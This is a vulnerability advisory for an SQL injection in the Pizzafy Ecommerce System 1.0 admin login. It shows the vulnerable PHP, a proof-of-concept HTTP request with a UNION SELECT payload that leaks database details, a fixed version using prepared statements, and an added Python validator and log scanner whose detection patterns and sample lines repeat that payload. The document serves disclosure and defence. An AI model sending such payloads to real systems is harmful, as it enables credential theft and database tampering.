# Vulnerability Summary: SQL Injection Vulnerability in Pizzafy Ecommerce System 1.0

## Vulnerability Overview

- **Vulnerability Type**: Error-Based SQL Injection
- **Severity**: HIGH
- **Affected Version**: Pizzafy Ecommerce System 1.0
- **Vulnerable Location**: `/pizzafy/admin/ajax.php?action=login`
- **Description**: The `username` parameter is interpolated directly into the SQL query without sanitization or parameterization, allowing attackers to inject arbitrary SQL. Because the raw database error message is returned to the client, the injection can be exploited error-based.

## Impact Scope

| Impact Type | Description |
|-------------|-------------|
| Confidentiality | Full exposure of database structure and user credentials |
| Integrity | Unauthorized deletion or modification of records |
| Availability | Service disruption due to large-scale data deletion |
| Privilege Escalation | Session hijacking and unauthorized admin access |

## Remediation

1. **Use Prepared Statements**: Employ parameterized queries to prevent SQL injection.
2. **Input Validation**: Strictly filter the `username` and `password` parameters.
3. **Database Permission Restrictions**: Limit the database user's privileges to minimize potential damage.
4. **Monitoring and Logging**: Track anomalous query patterns.
5. **Security Testing**: Conduct regular penetration testing and code reviews.
6. **Error Handling**: Avoid exposing database error messages in responses.

## Proof of Concept (POC)

### Vulnerable Code Snippet

```php
public function login() {
    $username = isset($_POST['username']) ? $_POST['username'] : '';
    $password = isset($_POST['password']) ? $_POST['password'] : '';
    // Vulnerable: $username is concatenated straight into the SQL string.
    $qry = $this->conn->query("SELECT * FROM users WHERE username = '$username'");
    if (!$qry) {
        // The raw MySQL error is returned to the client, enabling error-based injection.
        return $this->conn->error;
    }
    if ($qry && $qry->num_rows > 0) {
        $row = $qry->fetch_assoc();
        if (password_verify($password, $row['password'])) {
            $_SESSION['login_id'] = $row['id'];
            $_SESSION['login_name'] = $row['name'];
            $_SESSION['login_type'] = $row['type'];
            return 1;
        }
        // On a wrong password the whole matched row (including the hash) is returned.
        return json_encode($row);
    } else {
        return 2;
    }
}
```

### Example Exploit Request

```http
POST /pizzafy/admin/ajax.php?action=login HTTP/1.1
Host: localhost
Content-Length: 73
sec-ch-ua:
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 1.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/pizzafy/admin/login.php
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=04a312a9e4e4a1006bqunrp6
Connection: close

username=-1' union select 1,2,database(),version(),5%23&password=password
```

### Fixed Code

```php
public function login() {
    $username = isset($_POST['username']) ? $_POST['username'] : '';
    $password = isset($_POST['password']) ? $_POST['password'] : '';
    // Prepared statement: the username is bound as a string parameter,
    // so it can never alter the structure of the query.
    $stmt = $this->conn->prepare("SELECT * FROM users WHERE username = ?");
    $stmt->bind_param("s", $username);
    $stmt->execute();
    $qry = $stmt->get_result();
    if (!$qry) {
        // Still returns the raw error; per remediation item 6 this should be
        // logged server-side and replaced with a generic failure response.
        return $this->conn->error;
    }
    if ($qry && $qry->num_rows > 0) {
        $row = $qry->fetch_assoc();
        if (password_verify($password, $row['password'])) {
            $_SESSION['login_id'] = $row['id'];
            $_SESSION['login_name'] = $row['name'];
            $_SESSION['login_type'] = $row['type'];
            return 1;
        }
        // Wrong password now yields the same generic code as an unknown user.
        return 2;
    } else {
        return 2;
    }
}
```
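The following is an added example, not code from the advisory or from the Pizzafy project. It demonstrates two of the remediation items above on the defender's side: an allow-list validator for the `username` parameter (item 2) and a monitoring check (item 4) that scans application log lines recording the raw login POST body and flags SQL-injection indicators such as the `union select ... %23` payload in the PoC request. The log line format, the sample lines, and the helper names (`is_valid_username`, `sqli_indicators`, `scan_login_log`) are assumptions constructed for this example; the Pizzafy application does not ship such a log.

```python
"""Added example (not part of the advisory or the Pizzafy project).

Allow-list validation for the login `username` parameter plus a detector that
scans constructed application log lines for SQL-injection indicators.
"""
import re
from urllib.parse import parse_qs

# Usernames are expected to be short account names. Anything outside this
# allow-list is rejected before it can reach the database layer.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.@-]{1,64}$")

# Indicators of SQL syntax in a value that should never contain SQL.
# Each pattern carries a label that is reported in the alert.
SQLI_PATTERNS = [
    ("union-select", re.compile(r"union\s+(all\s+)?select", re.IGNORECASE)),
    ("quote-break", re.compile(r"['\"]\s*(or|and|union)\b", re.IGNORECASE)),
    ("comment-marker", re.compile(r"(#|--\s|/\*)")),
    ("info-function", re.compile(r"\b(database|version|user)\s*\(\s*\)", re.IGNORECASE)),
]

# Constructed log format (assumption): "<ts> <client_ip> <path> body=<raw POST body>"
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<ip>\S+) (?P<path>\S+) body=(?P<body>.*)$")

# Constructed sample log lines; the third one carries the PoC payload.
SAMPLE_LOG = [
    "2024-01-01T10:00:00Z 192.0.2.10 /pizzafy/admin/ajax.php?action=login body=username=admin&password=secret",
    "2024-01-01T10:00:05Z 192.0.2.10 /pizzafy/admin/ajax.php?action=save_settings body=name=Pizzafy",
    "2024-01-01T10:01:00Z 198.51.100.7 /pizzafy/admin/ajax.php?action=login body=username=-1' union select 1,2,database(),version(),5%23&password=password",
    "2024-01-01T10:01:30Z 198.51.100.7 /pizzafy/admin/ajax.php?action=login body=username=admin'--+&password=x",
]


def is_valid_username(username: str) -> bool:
    """Return True if the (already URL-decoded) username matches the allow-list."""
    return USERNAME_RE.fullmatch(username) is not None


def sqli_indicators(value: str) -> list[str]:
    """Return the labels of every SQLi indicator pattern found in a decoded value."""
    return [label for label, pattern in SQLI_PATTERNS if pattern.search(value)]


def scan_login_log(lines: list[str]) -> list[dict]:
    """Parse login log lines and return one alert dict per suspicious login attempt.

    A line is suspicious when the submitted username fails the allow-list or
    contains any SQLi indicator. Non-login actions are ignored.
    """
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or "action=login" not in m["path"]:
            continue
        # parse_qs URL-decodes the values, so %23 becomes '#' and '+' becomes ' '.
        params = parse_qs(m["body"], keep_blank_values=True)
        username = params.get("username", [""])[0]
        indicators = sqli_indicators(username)
        if indicators or not is_valid_username(username):
            alerts.append({
                "ts": m["ts"],
                "ip": m["ip"],
                "username": username,
                "indicators": indicators,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_login_log(SAMPLE_LOG):
        print(f"{alert['ts']} {alert['ip']} suspicious username={alert['username']!r} "
              f"indicators={alert['indicators']}")
```

Run against the sample lines, the benign `admin` login and the non-login action produce no alert, while the PoC payload trips all four indicator patterns and the trailing `'--+` attempt trips the comment-marker pattern. In a deployment the allow-list check belongs in the PHP handler before the query runs, and the scanner would consume the application's own request log rather than the constructed lines above.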